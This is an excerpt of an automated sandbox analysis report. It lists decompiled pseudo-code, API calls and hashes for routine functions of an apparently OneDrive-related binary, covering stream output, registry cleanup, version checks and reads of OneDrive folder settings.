    • Instruction ID: f40d8210c905ba99f79e74e3d444c15f633b7de09d60474bafd075927bb709fc
    • Opcode Fuzzy Hash: d503dfbe023836dc4c05f5a6cb5aff9c7ee3a770bf5e7bbb11a04ee6c8a083f2
    • Instruction Fuzzy Hash: BF51BD30A151168FDF24DFA8C9808ACBBB1FF09718B246119F956BB791D735EC44CB90
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E99F8B, Relevance: 7.6, APIs: 5, Instructions: 117COMMON
    Download Yara Rule
    C-Code - Quality: 34%
    			E00E99F8B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t66;
				signed int _t71;
				signed short _t73;
				signed int _t76;
				signed short _t78;
				signed int _t82;
				intOrPtr _t83;
				intOrPtr* _t85;
				signed int _t98;
				intOrPtr* _t102;
				void* _t103;
				intOrPtr _t105;

				_push(0x1c);
				E00EA31CA(E00EA3D83, __ebx, __edi, __esi);
				_t102 =  *((intOrPtr*)(_t103 + 8));
				_t82 = 0;
				 *(_t103 - 0x1c) = 0;
				_t98 =  *( *((intOrPtr*)(_t103 + 0xc)) + 0x10);
				 *(_t103 - 0x18) = _t98;
				_t58 =  *((intOrPtr*)( *_t102 + 4));
				_t83 =  *((intOrPtr*)(_t58 + _t102 + 0x20));
				_t59 =  *((intOrPtr*)(_t58 + _t102 + 0x24));
				_t105 = _t59;
				if(_t105 < 0 || _t105 <= 0 && _t83 <= 0) {
					L5:
					 *(_t103 - 0x14) = 0;
				} else {
					 *((intOrPtr*)(_t103 - 0x24)) = _t59;
					_t107 = _t83 - _t98;
					if(_t83 <= _t98) {
						goto L5;
					} else {
						 *((intOrPtr*)(_t103 - 0x24)) = _t59;
						 *(_t103 - 0x14) = _t83 - _t98;
					}
				}
				_push(_t102);
				_t60 = E00E97E66(_t82, _t103 - 0x28, 0, _t102, _t107);
				 *((intOrPtr*)(_t103 - 4)) = 0;
				if( *((char*)(_t103 - 0x24)) != 0) {
					 *((char*)(_t103 - 4)) = 1;
					_t62 =  *((intOrPtr*)( *_t102 + 4));
					__eflags = ( *(_t62 + _t102 + 0x14) & 0x000001c0) - 0x40;
					if(( *(_t62 + _t102 + 0x14) & 0x000001c0) == 0x40) {
						L14:
						_t85 =  *((intOrPtr*)(_t103 + 0xc));
						__eflags =  *((intOrPtr*)(_t85 + 0x14)) - 8;
						if( *((intOrPtr*)(_t85 + 0x14)) >= 8) {
							_t85 =  *_t85;
						}
						_t66 =  *((intOrPtr*)( *_t102 + 4));
						__imp__?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z(_t85,  *(_t103 - 0x18), 0);
						__eflags = _t66 -  *(_t103 - 0x18);
						if(_t66 !=  *(_t103 - 0x18)) {
							L24:
							_t82 = 4;
						} else {
							__eflags = _t98;
							if(_t98 != 0) {
								goto L24;
							} else {
								goto L18;
							}
						}
					} else {
						_t76 =  *(_t103 - 0x14);
						while(1) {
							__eflags = _t76;
							if(_t76 == 0) {
								break;
							}
							_t78 =  *( *((intOrPtr*)( *_t102 + 4)) + _t102 + 0x40) & 0x0000ffff;
							__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t78);
							__eflags = 0xffff - (_t78 & 0x0000ffff);
							if(0xffff != (_t78 & 0x0000ffff)) {
								_t76 =  *(_t103 - 0x14) - 1;
								 *(_t103 - 0x14) = _t76;
								continue;
							} else {
								_t82 = _t82 | 0x00000004;
								__eflags = _t82;
								 *(_t103 - 0x1c) = _t82;
							}
							break;
						}
						__eflags = _t82;
						if(_t82 != 0) {
							L18:
							_t71 =  *(_t103 - 0x14);
							while(1) {
								__eflags = _t71;
								if(_t71 == 0) {
									goto L25;
								}
								_t73 =  *( *((intOrPtr*)( *_t102 + 4)) + _t102 + 0x40) & 0x0000ffff;
								__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t73);
								__eflags = 0xffff - (_t73 & 0x0000ffff);
								if(0xffff != (_t73 & 0x0000ffff)) {
									_t71 =  *(_t103 - 0x14) - 1;
									 *(_t103 - 0x14) = _t71;
									continue;
								} else {
									_t82 = _t82 | 0x00000004;
								}
								goto L25;
							}
						} else {
							goto L14;
						}
					}
					L25:
					_t60 =  *((intOrPtr*)( *_t102 + 4));
					 *((intOrPtr*)(_t60 + _t102 + 0x20)) = 0;
					 *((intOrPtr*)(_t60 + _t102 + 0x24)) = 0;
					 *((intOrPtr*)(_t103 - 4)) = 0;
				} else {
					_t82 = 4;
				}
				__imp__?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z(_t82, 0);
				E00E97ED1(_t60, _t103 - 0x28);
				return E00EA313E(_t102);
			}



















    0x00e99f8b
    0x00e99f92
    0x00e99f9c
    0x00e99f9f
    0x00e99fa1
    0x00e99fa4
    0x00e99fa9
    0x00e99fac
    0x00e99faf
    0x00e99fb3
    0x00e99fb7
    0x00e99fb9
    0x00e99fd2
    0x00e99fd2
    0x00e99fc1
    0x00e99fc1
    0x00e99fc4
    0x00e99fc6
    0x00000000
    0x00e99fc8
    0x00e99fca
    0x00e99fcd
    0x00e99fcd
    0x00e99fc6
    0x00e99fd5
    0x00e99fd9
    0x00e99fde
    0x00e99fe5
    0x00e99fef
    0x00e99ff5
    0x00e9a001
    0x00e9a004
    0x00e9a039
    0x00e9a039
    0x00e9a03c
    0x00e9a040
    0x00e9a042
    0x00e9a042
    0x00e9a04a
    0x00e9a052
    0x00e9a058
    0x00e9a05b
    0x00e9a0a4
    0x00e9a0a6
    0x00e9a05d
    0x00e9a05d
    0x00e9a05f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00e9a05f
    0x00e9a006
    0x00e9a006
    0x00e9a009
    0x00e9a009
    0x00e9a00b
    0x00000000
    0x00000000
    0x00e9a012
    0x00e9a01c
    0x00e9a02a
    0x00e9a02d
    0x00e9a092
    0x00e9a093
    0x00000000
    0x00e9a02f
    0x00e9a02f
    0x00e9a02f
    0x00e9a032
    0x00e9a032
    0x00000000
    0x00e9a02d
    0x00e9a035
    0x00e9a037
    0x00e9a061
    0x00e9a061
    0x00e9a064
    0x00e9a064
    0x00e9a066
    0x00000000
    0x00000000
    0x00e9a06d
    0x00e9a077
    0x00e9a085
    0x00e9a088
    0x00e9a09e
    0x00e9a09f
    0x00000000
    0x00e9a08a
    0x00e9a08a
    0x00e9a08a
    0x00000000
    0x00e9a088
    0x00000000
    0x00000000
    0x00000000
    0x00e9a037
    0x00e9a0a7
    0x00e9a0a9
    0x00e9a0ac
    0x00e9a0b0
    0x00e9a0d8
    0x00e99fe7
    0x00e99fe9
    0x00e99fe9
    0x00e9a0e4
    0x00e9a0ed
    0x00e9a0f9

    APIs
    • __EH_prolog3_catch.LIBCMT ref: 00E99F92
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,00000000,0000001C,00E9A77B,00000000,?,?,00EB1B1C,00000002,00000001), ref: 00E9A01C
    • ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z.MSVCP120(?,?,00000000,00000000,0000001C,00E9A77B,00000000,?,?,00EB1B1C,00000002,00000001), ref: 00E9A052
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,?,00EB1B1C,00000002,00000001), ref: 00E9A077
    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000,?,00EB1B1C,00000002,00000001), ref: 00E9A0E4
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_W@std@@@std@@$?sputc@?$basic_streambuf@_$?setstate@?$basic_ios@_?sputn@?$basic_streambuf@_H_prolog3_catch
    • String ID:
    • API String ID: 1687759287-0
    • Opcode ID: 4ccaec86c9cb655ff170184475237e222f0514143a3a17a8686bc50dc39c5a58
    • Instruction ID: 756c82be18d639b570449104dbe5f790771c907a8a86ff9cf9dd519cc74fdb77
    • Opcode Fuzzy Hash: 4ccaec86c9cb655ff170184475237e222f0514143a3a17a8686bc50dc39c5a58
    • Instruction Fuzzy Hash: 10414434A002058FCF20DF99C5849BDBBF1FF58308B68506DE546EB292D632EE41CBA1
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA27F2, Relevance: 7.6, APIs: 5, Instructions: 105registryCOMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E00EA27F2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				short _t33;
				short _t38;
				signed short _t46;
				intOrPtr _t49;
				void* _t51;
				void* _t59;
				void* _t73;
				short* _t79;
				void* _t80;

				_t67 = __edi;
				_push(0x3c);
				E00EA3194(E00EA577A, __ebx, __edi, __esi);
				_t79 =  *(_t80 + 8);
				_t82 = _t79[0xa] - 8;
				if(_t79[0xa] < 8) {
					_t33 = _t79;
				} else {
					_t33 =  *_t79;
				}
				E00E94E9D(_t80 - 0x40, _t33);
				 *(_t80 - 4) = 0;
				_push(0);
				_push(_t80 - 0x40);
				 *((intOrPtr*)(_t80 - 0x48)) = E00EA2935(0, _t67, _t79, _t82);
				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
				E00E94307(_t80 - 0x40, 1, 0);
				_t83 = _t79[0xa] - 8;
				if(_t79[0xa] < 8) {
					_t38 = _t79;
				} else {
					_t38 =  *_t79;
				}
				E00E94E9D(_t80 - 0x40, _t38);
				 *(_t80 - 4) = 1;
				E00EA2935(0, 1, _t79, _t83);
				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
				E00E94307(_t80 - 0x40, 1, 0);
				E00E94E9D(_t80 - 0x28,  *0xeb0070);
				 *(_t80 - 4) = 2;
				E00E95904(_t80 - 0x28, _t79, 0, 0xffffffff);
				_t46 =  >=  ?  *((void*)(_t80 - 0x28)) : _t80 - 0x28;
				__imp__RegDeleteKeyExW(0x80000001, _t46, 0x1010b, 0, _t80 - 0x40, 1);
				_t59 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
				_t73 =  <=  ? RegOpenKeyExW(0x80000001,  *0xeb007c, 0, 0x1010b, _t80 - 0x44) : _t48 & 0x0000ffff | 0x80070000;
				if(_t73 >= 0) {
					if(_t79[0xa] >= 8) {
						_t79 =  *_t79;
					}
					_t73 =  <=  ? RegDeleteValueW( *(_t80 - 0x44), _t79) : _t53 & 0x0000ffff | 0x80070000;
					RegCloseKey( *(_t80 - 0x44));
				}
				E00EA298F();
				_t49 =  *((intOrPtr*)(_t80 - 0x48));
				_t74 =  !=  ? _t59 : _t73;
				_t75 =  !=  ? _t49 :  !=  ? _t59 : _t73;
				 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
				E00E94307(_t80 - 0x28, 1, 0);
				_t51 =  !=  ? _t49 :  !=  ? _t59 : _t73;
				return E00EA3152(_t59,  !=  ? _t49 :  !=  ? _t59 : _t73, _t79);
			}












    0x00ea27f2
    0x00ea27f2
    0x00ea27f9
    0x00ea27fe
    0x00ea2801
    0x00ea2805
    0x00ea280b
    0x00ea2807
    0x00ea2807
    0x00ea2807
    0x00ea2811
    0x00ea2818
    0x00ea281e
    0x00ea281f
    0x00ea2825
    0x00ea2828
    0x00ea2834
    0x00ea2839
    0x00ea283d
    0x00ea2843
    0x00ea283f
    0x00ea283f
    0x00ea283f
    0x00ea2849
    0x00ea284e
    0x00ea2856
    0x00ea285b
    0x00ea2864
    0x00ea2872
    0x00ea2877
    0x00ea2885
    0x00ea2892
    0x00ea28a2
    0x00ea28b3
    0x00ea28d9
    0x00ea28de
    0x00ea28e4
    0x00ea28e6
    0x00ea28e6
    0x00ea2900
    0x00ea2903
    0x00ea2903
    0x00ea2909
    0x00ea290e
    0x00ea2913
    0x00ea2918
    0x00ea291b
    0x00ea2926
    0x00ea292b
    0x00ea2932

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA27F9
    • RegDeleteKeyExW.ADVAPI32(80000001,?,0001010B,00000000,?,00000000,000000FF,00000001,00000000,?,00000001,?,00000001,00000000,?,00000000), ref: 00EA28A2
    • RegOpenKeyExW.ADVAPI32(80000001,00000000,0001010B,?,?,?,?,?,?,0000003C), ref: 00EA28C8
    • RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,0000003C), ref: 00EA28EC
    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,0000003C), ref: 00EA2903
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Delete$CloseH_prolog3_OpenValue
    • String ID:
    • API String ID: 1242867327-0
    • Opcode ID: 8bafb4d32f36c8a5796d53a6a97026ef0f4202bb37855c9c786c3068adf46145
    • Instruction ID: 2cec295c324d7d67603f3c3cb42fa2b379e230204f44a08e380d6153735c77a2
    • Opcode Fuzzy Hash: 8bafb4d32f36c8a5796d53a6a97026ef0f4202bb37855c9c786c3068adf46145
    • Instruction Fuzzy Hash: 9C314E71900204DBDB10EFA9CC89EDEBBF9EF4A710F101619F552BB190DB34AA46CB60
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA12BB, Relevance: 7.6, APIs: 5, Instructions: 65COMMON
    Download Yara Rule
    C-Code - Quality: 31%
    			E00EA12BB(void* __edx, signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, short _a20, intOrPtr _a24) {
				signed int _v8;
				void _v270;
				struct _OSVERSIONINFOEXW _v292;
				void* __esi;
				signed int _t22;
				void* _t36;
				void* _t44;
				void* _t45;
				intOrPtr* _t47;
				signed int _t48;

				_t44 = __edx;
				_t22 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t22 ^ _t48;
				_v292.dwOSVersionInfoSize = 0x11c;
				_v292.dwMajorVersion = 0;
				_v292.szCSDVersion = 0;
				_v292.dwMinorVersion = 0;
				_v292.dwBuildNumber = 0;
				_v292.dwPlatformId = 0;
				memset( &_v270, 0, 0xfe);
				_v292.wSuiteMask = 0;
				_v292.wServicePackMajor = 0;
				_t47 = __imp__VerSetConditionMask;
				 *_t47(0, 0, 2, _a8, 1, _a16, 0x20, _a24);
				 *_t47(0, _t44);
				 *_t47(0, _t44);
				_v292.dwMajorVersion = _a4 & 0x0000ffff;
				_v292.dwMinorVersion = _a12 & 0x0000ffff;
				_v292.wServicePackMajor = _a20;
				VerifyVersionInfoW( &_v292, 0x23, 0);
				asm("sbb eax, eax");
				return E00EA29F2(_t36, _v8 ^ _t48, _t44, _t45, _t47, _t44);
			}













    0x00ea12bb
    0x00ea12c6
    0x00ea12cd
    0x00ea12d3
    0x00ea12df
    0x00ea12ea
    0x00ea12f9
    0x00ea12ff
    0x00ea1305
    0x00ea130b
    0x00ea1313
    0x00ea1318
    0x00ea132c
    0x00ea1332
    0x00ea1336
    0x00ea133a
    0x00ea1342
    0x00ea1358
    0x00ea1362
    0x00ea1366
    0x00ea1372
    0x00ea1380

    APIs
    • memset.MSVCR120 ref: 00EA130B
    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?,00000001,?,00000020,?), ref: 00EA1332
    • VerSetConditionMask.KERNEL32(00000000), ref: 00EA1336
    • VerSetConditionMask.KERNEL32(00000000), ref: 00EA133A
    • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00EA1366
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ConditionMask$InfoVerifyVersionmemset
    • String ID:
    • API String ID: 375572348-0
    • Opcode ID: 5899916f07db2301d12f2ee8ba35f19f3f676c45f985d13b44b567b0c4972498
    • Instruction ID: 96065bcf21d89a59913f702509909356e0e74ed35ca0293691c54596d2fe772c
    • Opcode Fuzzy Hash: 5899916f07db2301d12f2ee8ba35f19f3f676c45f985d13b44b567b0c4972498
    • Instruction Fuzzy Hash: 80215E71D4022CAFCB24DF65DC46BEA7BB8EF49710F00819AB548E7280D6749A948FD0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9330A, Relevance: 7.6, APIs: 5, Instructions: 54windowsleepCOMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E00E9330A(intOrPtr __ecx, void* __edx, void* __edi) {
				signed int _v8;
				struct tagMSG _v36;
				void* __ebx;
				void* __esi;
				signed int _t7;
				void* _t25;
				void* _t26;
				void* _t27;
				signed int _t28;
				void* _t32;

				_t26 = __edi;
				_t25 = __edx;
				_t7 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t7 ^ _t28;
				_t27 = E00E93696(__ecx, __ecx);
				if(_t27 != 0) {
					L4:
					if(_t32 < 0) {
						L7:
						return E00EA29F2(0, _v8 ^ _t28, _t25, _t26, _t27);
					}
					L5:
					_t27 = E00E93A97();
					if( *0xeb1824 != 0) {
						Sleep( *0xeb1820);
					}
					goto L7;
				}
				if(GetMessageW( &_v36, 0, 0, 0) <= 0) {
					goto L5;
				} else {
					goto L2;
				}
				do {
					L2:
					TranslateMessage( &_v36);
					DispatchMessageW( &_v36);
				} while (GetMessageW( &_v36, 0, 0, 0) > 0);
				_t32 = _t27;
				goto L4;
			}













    0x00e9330a
    0x00e9330a
    0x00e93312
    0x00e93319
    0x00e93324
    0x00e93328
    0x00e93364
    0x00e93364
    0x00e93382
    0x00e93393
    0x00e93393
    0x00e93366
    0x00e93372
    0x00e93374
    0x00e9337c
    0x00e9337c
    0x00000000
    0x00e93374
    0x00e9333b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00e9333d
    0x00e9333d
    0x00e93341
    0x00e9334b
    0x00e9335e
    0x00e93362
    0x00000000

    APIs
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E93333
    • TranslateMessage.USER32(?), ref: 00E93341
    • DispatchMessageW.USER32 ref: 00E9334B
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E93358
    • Sleep.KERNEL32(?,00000000), ref: 00E9337C
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Message$DispatchSleepTranslate
    • String ID:
    • API String ID: 3237117195-0
    • Opcode ID: 2aec729f22f5cc442d093732a515c707c27ef31f5e3dad3e8bc42ad4f7a164c2
    • Instruction ID: 34e4ee46a6793c4be3e8622fb6c80888c45c48ce08d7bd6659d3ef774642e3ed
    • Opcode Fuzzy Hash: 2aec729f22f5cc442d093732a515c707c27ef31f5e3dad3e8bc42ad4f7a164c2
    • Instruction Fuzzy Hash: 2A014472900228AFDF11ABB59D89DAF77ACFB09794B091559F911F3110DA25DE0887B0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9999F, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 119COMMON
    Download Yara Rule
    C-Code - Quality: 61%
    			E00E9999F(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr* _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				intOrPtr _v20;
				void* _t52;
				intOrPtr _t54;
				signed int _t55;
				intOrPtr* _t72;
				intOrPtr* _t82;
				intOrPtr _t84;
				signed int _t85;
				intOrPtr* _t88;
				signed int _t89;
				signed int _t92;
				intOrPtr* _t93;
				void* _t99;
				intOrPtr* _t102;

				_t97 = __edi;
				_t80 = __ebx;
				_push(__ebx);
				_push(__esi);
				_t102 = __ecx;
				_push(__edi);
				_t84 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t84 < _a4) {
					L31:
					__imp__?_Xout_of_range@std@@YAXPBD@Z("invalid string position");
					asm("int3");
					_push(4);
					_t52 = E00EA3161(E00EA3D0C, _t80, _t97, _t102);
					_t85 = _a4;
					_v20 = _t85;
					_v8 = _v8 & 0x00000000;
					if(_t85 != 0) {
						_t52 = E00E9A1D7(_t85, _a8);
					}
					return E00EA313E(_t52);
				} else {
					_t80 = _a8;
					_t92 = _a12;
					_t54 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t54 < _t92) {
						goto L31;
					} else {
						_t55 = _t54 - _t92;
						_t99 =  <  ? _t55 : _a16;
						if((_t55 | 0xffffffff) - _t84 <= _t99) {
							__imp__?_Xlength_error@std@@YAXPBD@Z("string too long");
						}
						if(_t99 != 0) {
							_a16 = _t84 + _t99;
							if(E00E94D8F(_t80, _t102, _t99, _t84 + _t99, 0) != 0) {
								if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
									_a8 = _t102;
								} else {
									_a8 =  *_t102;
								}
								if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
									_t93 = _t102;
								} else {
									_t93 =  *_t102;
								}
								E00E94B32(_t93 + (_a4 + _t99) * 2, _a8 + _a4 * 2,  *(_t102 + 0x10) - _a4);
								if(_t102 != _t80) {
									if( *((intOrPtr*)(_t80 + 0x14)) >= 8) {
										_t80 =  *_t80;
									}
									if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
										_t88 = _t102;
									} else {
										_t88 =  *_t102;
									}
									E00E942E3(_t88 + _a4 * 2, _t80 + _a12 * 2, _t99);
								} else {
									if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
										_a8 = _t102;
									} else {
										_a8 =  *_t102;
									}
									if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
										_t82 = _t102;
									} else {
										_t82 =  *_t102;
									}
									_t91 =  <  ? _a12 + _t99 : _a12;
									E00E94B32(_t82 + _a4 * 2, _a8 + ( <  ? _a12 + _t99 : _a12) * 2, _t99);
								}
								_t89 = _a16;
								 *(_t102 + 0x10) = _t89;
								if( *((intOrPtr*)(_t102 + 0x14)) < 8) {
									_t72 = _t102;
								} else {
									_t72 =  *_t102;
								}
								 *((short*)(_t72 + _t89 * 2)) = 0;
							}
						}
						return _t102;
					}
				}
			}


















    0x00e9999f
    0x00e9999f
    0x00e999a4
    0x00e999a5
    0x00e999a6
    0x00e999a8
    0x00e999a9
    0x00e999af
    0x00e99acc
    0x00e99ad1
    0x00e99ad7
    0x00e99ad8
    0x00e99adf
    0x00e99ae4
    0x00e99ae7
    0x00e99aea
    0x00e99af0
    0x00e99af5
    0x00e99af5
    0x00e99aff
    0x00e999b5
    0x00e999b5
    0x00e999b8
    0x00e999bb
    0x00e999c0
    0x00000000
    0x00e999c6
    0x00e999c9
    0x00e999cd
    0x00e999d7
    0x00e999de
    0x00e999de
    0x00e999e6
    0x00e999f4
    0x00e999fe
    0x00e99a08
    0x00e99a11
    0x00e99a0a
    0x00e99a0c
    0x00e99a0c
    0x00e99a18
    0x00e99a1e
    0x00e99a1a
    0x00e99a1a
    0x00e99a1a
    0x00e99a37
    0x00e99a41
    0x00e99a84
    0x00e99a86
    0x00e99a86
    0x00e99a8c
    0x00e99a92
    0x00e99a8e
    0x00e99a8e
    0x00e99a8e
    0x00e99aa3
    0x00e99a43
    0x00e99a47
    0x00e99a50
    0x00e99a49
    0x00e99a4b
    0x00e99a4b
    0x00e99a57
    0x00e99a5d
    0x00e99a59
    0x00e99a59
    0x00e99a59
    0x00e99a6b
    0x00e99a79
    0x00e99a79
    0x00e99aa8
    0x00e99ab2
    0x00e99ab5
    0x00e99abb
    0x00e99ab7
    0x00e99ab7
    0x00e99ab7
    0x00e99abf
    0x00e99abf
    0x00e999fe
    0x00e99ac9
    0x00e99ac9
    0x00e999c0

    APIs
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99927,00000000,BB40E64E,00000000,000000FF,00000000,?,?,00E912F1,?,00000000), ref: 00E999DE
    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99927,00000000,BB40E64E,00000000,000000FF,00000000,?,?,00E912F1,?,00000000), ref: 00E99AD1
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xlength_error@std@@Xout_of_range@std@@
    • String ID: invalid string position$string too long
    • API String ID: 737550999-4289949731
    • Opcode ID: 930212bc5f5d6a8adb430c2bc03d72984f642b3f3f00314ed91c6358072849ff
    • Instruction ID: 4d6c7ae85d8c642e650035419496ac6a6faa33555e8dfeec6de86dc60e48544a
    • Opcode Fuzzy Hash: 930212bc5f5d6a8adb430c2bc03d72984f642b3f3f00314ed91c6358072849ff
    • Instruction Fuzzy Hash: 0B416F71200209DFCF24CF5CD88499A73FAFF89744720592EE856AB252DBB0E955CBA1
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9E0B1, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106COMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E00E9E0B1(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t46;
				void* _t53;
				intOrPtr _t88;
				intOrPtr* _t91;
				void* _t93;
				void* _t94;

				_t94 = __eflags;
				E00EA3194(E00EA4AD0, __ebx, __edi, __esi);
				_t91 = __ecx;
				_t88 =  *((intOrPtr*)(_t93 + 8));
				_t70 =  *((intOrPtr*)(_t93 + 0xc));
				E00E953DD(_t93 - 0x174, _t88, __ecx, _t94);
				 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
				 *((intOrPtr*)( *_t91 + 0x14))(_t88, _t93 - 0x174, 0x168);
				_push("\\");
				_push(0xeb1368);
				_push(_t93 - 0x28);
				_t46 = E00E997F4( *((intOrPtr*)(_t93 + 0xc)), _t88, _t91, _t94);
				 *(_t93 - 4) = 1;
				E00E95758(_t91, _t93 - 0x58, _t46, _t88);
				 *(_t93 - 4) = 3;
				E00E94307(_t93 - 0x28, 1, 0);
				E00E94E9D(_t93 - 0x40, L"UserFolder");
				 *(_t93 - 4) = 4;
				_t53 = E00E9F5DC(0x80000001, _t93 - 0x58, _t93 - 0x40,  *((intOrPtr*)(_t93 + 0xc)), 0, 0);
				_t92 = _t53;
				 *(_t93 - 4) = 3;
				E00E94307(_t93 - 0x40, 1, 0);
				if(_t53 >= 0 &&  *((char*)(_t93 - 0x12c)) == 0) {
					E00E94E9D(_t93 - 0x28, L"UserFolder");
					 *(_t93 - 4) = 5;
					E00E94E9D(_t93 - 0x40, L"Software\\Microsoft\\OneDrive");
					 *(_t93 - 4) = 6;
					E00E9F5DC(0x80000001, _t93 - 0x40, _t93 - 0x28, _t70, 0, 0);
					 *(_t93 - 4) = 5;
					E00E94307(_t93 - 0x40, 1, 0);
					 *(_t93 - 4) = 3;
					E00E94307(_t93 - 0x28, 1, 0);
				}
				E00E94E9D(_t93 - 0x28, L"OneDrive");
				 *(_t93 - 4) = 7;
				E00E9F679(_t93 - 0x28, _t70);
				 *(_t93 - 4) = 3;
				E00E94307(_t93 - 0x28, 1, 0);
				 *(_t93 - 4) = 0;
				E00E94307(_t93 - 0x58, 1, 0);
				 *(_t93 - 4) =  *(_t93 - 4) | 0xffffffff;
				E00E94681(_t93 - 0x174);
				return E00EA3152(0, 0, _t92);
			}









    0x00e9e0b1
    0x00e9e0bb
    0x00e9e0c0
    0x00e9e0c2
    0x00e9e0cb
    0x00e9e0ce
    0x00e9e0d3
    0x00e9e0e3
    0x00e9e0e6
    0x00e9e0eb
    0x00e9e0f3
    0x00e9e0f4
    0x00e9e0f9
    0x00e9e103
    0x00e9e108
    0x00e9e114
    0x00e9e121
